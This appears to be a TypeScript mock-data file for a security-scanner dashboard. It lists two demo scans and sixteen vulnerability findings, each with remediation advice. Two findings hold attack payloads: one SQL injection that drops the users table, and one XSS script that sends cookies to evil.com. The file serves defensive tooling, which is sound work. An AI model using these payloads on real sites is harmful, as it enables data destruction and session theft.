import type { DastScan, DastFinding } from '@/lib/types'

export const MOCK_DAST_SCANS: DastScan[] = [
  {
    id: 'dast-scan-001',
    orgId: 'org-demo',
    name: 'Production Web App',
    targetUrl: 'https://app.example.com',
    scanProfile: 'full',
    status: 'COMPLETED',
    progress: 100,
    currentPhase: 'complete',
    riskScore: 72,
    endpointsDiscovered: 147,
    endpointsTested: 142,
    payloadsSent: 3840,
    criticalCount: 2,
    highCount: 4,
    mediumCount: 5,
    lowCount: 2,
    infoCount: 1,
    executiveSummary: 'Scan identified 14 vulnerabilities across 142 endpoints. Two critical findings require immediate remediation.',
    reportUrl: null,
    startedAt: '2026-03-12T08:00:00Z',
    completedAt: '2026-03-12T09:23:00Z',
    createdAt: '2026-03-12T07:58:00Z',
  },
  {
    id: 'dast-scan-002',
    orgId: 'org-demo',
    name: 'Staging API',
    targetUrl: 'https://api-staging.example.com',
    scanProfile: 'api_only',
    status: 'COMPLETED',
    progress: 100,
    currentPhase: 'complete',
    riskScore: 45,
    endpointsDiscovered: 63,
    endpointsTested: 63,
    payloadsSent: 1890,
    criticalCount: 0,
    highCount: 2,
    mediumCount: 3,
    lowCount: 4,
    infoCount: 2,
    executiveSummary: 'API scan completed with no critical findings. Two high-severity issues found in authentication endpoints.',
    reportUrl: null,
    startedAt: '2026-03-11T14:00:00Z',
    completedAt: '2026-03-11T14:42:00Z',
    createdAt: '2026-03-11T13:58:00Z',
  },
]

export const MOCK_DAST_FINDINGS: DastFinding[] = [
  {
    id: 'dast-f-001',
    scanId: 'dast-scan-001',
    type: 'sql-injection',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-89',
    severity: 'CRITICAL',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    riskScore: 98,
    title: 'SQL Injection in Search Parameter',
    description: 'The search parameter on /api/products is vulnerable to SQL injection. An attacker can extract, modify, or delete data from the database.',
    businessImpact: 'Full database compromise. Customer PII, payment data, and authentication credentials may be exfiltrated.',
    affectedUrl: 'https://app.example.com/api/products?search=test',
    affectedParameter: 'search',
    payload: "' OR 1=1; DROP TABLE users--",
    remediation: 'Use parameterized queries or prepared statements. Never concatenate user input into SQL queries.',
    remediationCode: JSON.stringify({
      vulnerableCode: "const query = `SELECT * FROM products WHERE name LIKE '%${search}%'`",
      remediatedCode: "const query = 'SELECT * FROM products WHERE name LIKE $1'\nconst params = [`%${search}%`]",
      explanation: 'Replace string interpolation with parameterized query to prevent SQL injection.',
    }),
    pciDssRefs: ['6.5.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-002',
    scanId: 'dast-scan-001',
    type: 'xss-reflected',
    owaspCategory: 'A03:2021 Injection',
    cweId: 'CWE-79',
    severity: 'CRITICAL',
    cvssScore: 9.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N',
    riskScore: 92,
    title: 'Reflected XSS in Error Page',
    description: 'The error parameter is reflected in the page without proper encoding, allowing script injection.',
    businessImpact: 'Session hijacking, credential theft, phishing attacks targeting authenticated users.',
    affectedUrl: 'https://app.example.com/error?msg=test',
    affectedParameter: 'msg',
    payload: '<script>document.location="https://evil.com/steal?c="+document.cookie</script>',
    remediation: 'HTML-encode all user-supplied data before rendering in the page. Implement Content-Security-Policy headers.',
    remediationCode: JSON.stringify({
      vulnerableCode: '<div>{errorMessage}</div>',
      remediatedCode: '<div>{DOMPurify.sanitize(errorMessage)}</div>',
      explanation: 'Sanitize user input before rendering to prevent XSS.',
    }),
    pciDssRefs: ['6.5.7'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1059.007'],
    confidenceScore: 90,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-003',
    scanId: 'dast-scan-001',
    type: 'broken-auth',
    owaspCategory: 'A07:2021 Auth Failures',
    cweId: 'CWE-287',
    severity: 'HIGH',
    cvssScore: 8.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N',
    riskScore: 85,
    title: 'No Rate Limiting on Login Endpoint',
    description: 'The /api/auth/login endpoint accepts unlimited authentication attempts without rate limiting or account lockout.',
    businessImpact: 'Enables brute force and credential stuffing attacks against user accounts.',
    affectedUrl: 'https://app.example.com/api/auth/login',
    affectedParameter: null,
    payload: null,
    remediation: 'Implement rate limiting (e.g., 5 attempts per minute). Add progressive delays and account lockout after repeated failures.',
    remediationCode: null,
    pciDssRefs: ['8.1.6'],
    soc2Refs: ['CC6.1', 'CC6.2'],
    mitreAttackIds: ['T1110'],
    confidenceScore: 88,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-004',
    scanId: 'dast-scan-001',
    type: 'security-misconfiguration',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-693',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N',
    riskScore: 78,
    title: 'Missing Security Headers',
    description: 'Multiple security headers are missing: Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security.',
    businessImpact: 'Increases risk of clickjacking, MIME-sniffing, and man-in-the-middle attacks.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Add security headers: CSP, X-Frame-Options: DENY, X-Content-Type-Options: nosniff, HSTS with max-age >= 31536000.',
    remediationCode: null,
    pciDssRefs: ['6.5.10'],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1557'],
    confidenceScore: 98,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-005',
    scanId: 'dast-scan-001',
    type: 'sensitive-data',
    owaspCategory: 'A02:2021 Cryptographic Failures',
    cweId: 'CWE-200',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 76,
    title: 'Sensitive Data in API Response',
    description: 'The /api/users endpoint returns password hashes, internal IDs, and email addresses in the response body.',
    businessImpact: 'Leaks sensitive user data that can be used for account takeover or identity theft.',
    affectedUrl: 'https://app.example.com/api/users',
    affectedParameter: null,
    payload: null,
    remediation: 'Filter sensitive fields from API responses. Use DTOs to control which fields are exposed.',
    remediationCode: null,
    pciDssRefs: ['3.4', '6.5.3'],
    soc2Refs: ['CC6.1', 'CC6.5'],
    mitreAttackIds: ['T1530'],
    confidenceScore: 85,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-006',
    scanId: 'dast-scan-001',
    type: 'csrf',
    owaspCategory: 'A01:2021 Broken Access Control',
    cweId: 'CWE-352',
    severity: 'HIGH',
    cvssScore: 7.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L',
    riskScore: 72,
    title: 'CSRF on Account Settings',
    description: 'The account settings form at /settings/profile lacks CSRF protection. State-changing requests can be forged.',
    businessImpact: 'Attackers can change user email, password, or other settings via forged requests.',
    affectedUrl: 'https://app.example.com/settings/profile',
    affectedParameter: null,
    payload: null,
    remediation: 'Implement CSRF tokens on all state-changing forms and verify them server-side.',
    remediationCode: null,
    pciDssRefs: ['6.5.9'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1185'],
    confidenceScore: 82,
    status: 'OPEN',
    isConfirmed: false,
  },
  {
    id: 'dast-f-007',
    scanId: 'dast-scan-001',
    type: 'information-disclosure',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-200',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 52,
    title: 'Server Version Disclosed in Headers',
    description: 'The Server header reveals the web server version: nginx/1.24.0. This helps attackers identify known vulnerabilities.',
    businessImpact: 'Aids reconnaissance for targeted attacks against known server vulnerabilities.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Remove or obfuscate the Server header. Configure nginx with server_tokens off.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1592'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-008',
    scanId: 'dast-scan-001',
    type: 'cookie-security',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-614',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N',
    riskScore: 48,
    title: 'Session Cookie Missing Secure Flag',
    description: 'The session cookie "sid" is set without the Secure flag, allowing transmission over unencrypted HTTP connections.',
    businessImpact: 'Session tokens may be intercepted over insecure connections, enabling session hijacking.',
    affectedUrl: 'https://app.example.com/api/auth/login',
    affectedParameter: null,
    payload: null,
    remediation: 'Set the Secure and HttpOnly flags on all session cookies. Add SameSite=Strict attribute.',
    remediationCode: null,
    pciDssRefs: ['6.5.10'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1539'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-009',
    scanId: 'dast-scan-001',
    type: 'directory-listing',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-548',
    severity: 'MEDIUM',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 45,
    title: 'Directory Listing Enabled',
    description: 'Directory listing is enabled on /static/uploads/, exposing uploaded file names and structure.',
    businessImpact: 'May expose sensitive file names, internal naming conventions, or uploaded user content.',
    affectedUrl: 'https://app.example.com/static/uploads/',
    affectedParameter: null,
    payload: null,
    remediation: 'Disable directory listing in the web server configuration. Add index files or return 403.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1083'],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-010',
    scanId: 'dast-scan-001',
    type: 'cors-misconfiguration',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-942',
    severity: 'MEDIUM',
    cvssScore: 4.7,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N',
    riskScore: 42,
    title: 'Overly Permissive CORS Policy',
    description: 'The API responds with Access-Control-Allow-Origin: * on authenticated endpoints, allowing any origin to make cross-origin requests.',
    businessImpact: 'Enables cross-origin data theft from authenticated user sessions.',
    affectedUrl: 'https://app.example.com/api/users/me',
    affectedParameter: null,
    payload: null,
    remediation: 'Configure CORS to allow only trusted origins. Never use wildcard with credentials.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: ['CC6.6'],
    mitreAttackIds: ['T1185'],
    confidenceScore: 90,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-011',
    scanId: 'dast-scan-001',
    type: 'tls-weakness',
    owaspCategory: 'A02:2021 Cryptographic Failures',
    cweId: 'CWE-326',
    severity: 'MEDIUM',
    cvssScore: 4.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N',
    riskScore: 38,
    title: 'Weak TLS Cipher Suites Supported',
    description: 'The server supports TLS_RSA_WITH_AES_128_CBC_SHA which is considered weak.',
    businessImpact: 'May allow decryption of traffic by sophisticated attackers.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Disable weak cipher suites. Only allow TLS 1.2+ with AEAD cipher suites.',
    remediationCode: null,
    pciDssRefs: ['4.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1557'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-012',
    scanId: 'dast-scan-001',
    type: 'verbose-error',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: 'CWE-209',
    severity: 'LOW',
    cvssScore: 3.7,
    cvssVector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 28,
    title: 'Verbose Error Messages',
    description: 'Stack traces and internal paths are returned in error responses (e.g., /api/products/invalid).',
    businessImpact: 'Reveals internal architecture details useful for further attacks.',
    affectedUrl: 'https://app.example.com/api/products/invalid',
    affectedParameter: null,
    payload: null,
    remediation: 'Return generic error messages to clients. Log detailed errors server-side only.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: ['T1592'],
    confidenceScore: 92,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-013',
    scanId: 'dast-scan-001',
    type: 'autocomplete',
    owaspCategory: 'A04:2021 Insecure Design',
    cweId: 'CWE-524',
    severity: 'LOW',
    cvssScore: 2.4,
    cvssVector: 'CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    riskScore: 15,
    title: 'Password Field Autocomplete Enabled',
    description: 'The login form password field has autocomplete enabled, allowing browsers to cache credentials.',
    businessImpact: 'Cached credentials on shared devices may be accessed by other users.',
    affectedUrl: 'https://app.example.com/login',
    affectedParameter: 'password',
    payload: null,
    remediation: 'Add autocomplete="off" to password input fields on sensitive forms.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: [],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-014',
    scanId: 'dast-scan-001',
    type: 'info-disclosure',
    owaspCategory: 'A05:2021 Security Misconfiguration',
    cweId: null,
    severity: 'INFO',
    cvssScore: null,
    cvssVector: null,
    riskScore: 5,
    title: 'Application Fingerprinting',
    description: 'The application can be identified as Next.js based on response headers and JavaScript bundle patterns.',
    businessImpact: 'Aids reconnaissance but poses minimal direct risk.',
    affectedUrl: 'https://app.example.com/',
    affectedParameter: null,
    payload: null,
    remediation: 'Consider removing X-Powered-By header. This is informational only.',
    remediationCode: null,
    pciDssRefs: [],
    soc2Refs: [],
    mitreAttackIds: [],
    confidenceScore: 99,
    status: 'OPEN',
    isConfirmed: true,
  },
  // ── Scan 002 findings ──
  {
    id: 'dast-f-015',
    scanId: 'dast-scan-002',
    type: 'broken-auth',
    owaspCategory: 'A07:2021 Auth Failures',
    cweId: 'CWE-306',
    severity: 'HIGH',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    riskScore: 78,
    title: 'API Endpoint Missing Authentication',
    description: 'The /api/v2/internal/metrics endpoint is accessible without authentication and exposes internal system metrics.',
    businessImpact: 'Internal metrics may reveal system architecture, performance bottlenecks, and scaling information.',
    affectedUrl: 'https://api-staging.example.com/api/v2/internal/metrics',
    affectedParameter: null,
    payload: null,
    remediation: 'Add authentication middleware to all internal API endpoints.',
    remediationCode: null,
    pciDssRefs: ['7.1'],
    soc2Refs: ['CC6.1'],
    mitreAttackIds: ['T1190'],
    confidenceScore: 95,
    status: 'OPEN',
    isConfirmed: true,
  },
  {
    id: 'dast-f-016',
    scanId: 'dast-scan-002',
    type: 'idor',
    owaspCategory: 'A01:2021 Broken Access Control',
    cweId: 'CWE-639',
    severity: 'HIGH',
    cvssScore: 7.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N',
    riskScore: 72,
    title: 'IDOR on User Profile Endpoint',
    description: 'The /api/v2/users/:id endpoint allows authenticated users to access other users\' profiles by changing the ID parameter.',
    businessImpact: 'Any authenticated user can access other users\' profile data including email and settings.',
    affectedUrl: 'https://api-staging.example.com/api/v2/users/123',
    affectedParameter: 'id',
    payload: null,
    remediation: 'Implement authorization checks to verify the requesting user owns the resource.',
    remediationCode: null,
    pciDssRefs: ['7.1', '7.2'],
    soc2Refs: ['CC6.1', 'CC6.3'],
    mitreAttackIds: ['T1078'],
    confidenceScore: 80,
    status: 'OPEN',
    isConfirmed: false,
  },
]
